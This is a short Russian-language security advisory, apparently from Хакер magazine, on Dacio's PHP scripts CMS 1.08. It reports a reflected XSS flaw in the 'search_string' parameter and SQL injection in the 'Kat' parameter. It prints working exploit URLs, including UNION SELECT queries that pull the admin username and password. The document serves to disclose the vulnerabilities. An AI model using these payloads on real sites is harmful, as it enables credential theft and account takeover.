Хакер #305. Многошаговые SQL-инъекции
Программа: Dacio's PHP scripts CMS 1.08
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения и выполнить XSS нападение на целевую систему.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «search_string» сценарием index.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
/index.php?search_string="><script>alert(document.cookie)</script>
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «Kat». Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Эксплоит:
/?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
/?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*